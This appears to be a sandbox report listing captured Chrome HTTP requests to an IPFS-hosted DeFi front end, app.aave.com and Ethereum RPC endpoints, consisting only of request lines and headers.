Source: global trafficHTTP traffic detected: GET /_next/static/chunks/102.0286c0488e0d6096.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4284-b57bc1e747434eb3.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4506-02a1164e49710964.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/index-92ce489f6f7c51ed.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4245-42e3ee29ff341df5.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /flashbots-protect/quick-start HTTP/1.1Host: docs.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "bd6b6b1c91dc1a52bd3d1aad82bd575d"
Source: global trafficHTTP traffic detected: GET /v1/62b3314e123e6f00397f19ca HTTP/1.1Host: eth-mainnet.rpc.grove.cityConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/markets-4f45529ba852aa6f.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /icons/tokens/stkbptv2.svg HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /icons/tokens/aave.svg HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /icons/tokens/gho.svg HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9388.ff9a5272b437e6f3.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1066.9e549ab8e48c2ae2.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9f96d65d-7b812644c8c0f1f1.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9605-bf04d5bf386627f4.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/2284-c8e8c4a9494b7235.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1315-7550bff8c0343bd6.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3000-a40fb3af74ef8ff5.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/governance-a17757b11c661747.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/425.555cf6c72ac0d764.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/102.0286c0488e0d6096.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/501.32a1d2d2411733f6.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8345.c21c07eb7538546d.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9388.ff9a5272b437e6f3.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/v3-migration-baa8f5f0ea1977d8.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1066.9e549ab8e48c2ae2.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /icons/tokens/aave.svg HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /icons/tokens/gho.svg HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /icons/tokens/stkbptv2.svg HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/425.555cf6c72ac0d764.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8345.c21c07eb7538546d.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/501.32a1d2d2411733f6.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /v1/62b3314e123e6f00397f19ca HTTP/1.1Host: eth-mainnet.rpc.grove.cityConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/Inter-ExtraBold.d65f0281.woff2 HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/css/0da2d62e1a58e826.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /v1/62b3314e123e6f00397f19ca HTTP/1.1Host: eth-mainnet.rpc.grove.cityConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /markets/ HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /v1/62b3314e123e6f00397f19ca HTTP/1.1Host: eth-mainnet.rpc.grove.cityConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v1/62b3314e123e6f00397f19ca HTTP/1.1Host: eth-mainnet.rpc.grove.cityConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /illustration_desktop.png HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/markets/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /eth HTTP/1.1Host: rpc.ankr.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/reserve-overview-9124a4eaac07e2b6.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/markets/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /illustration_desktop.png HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
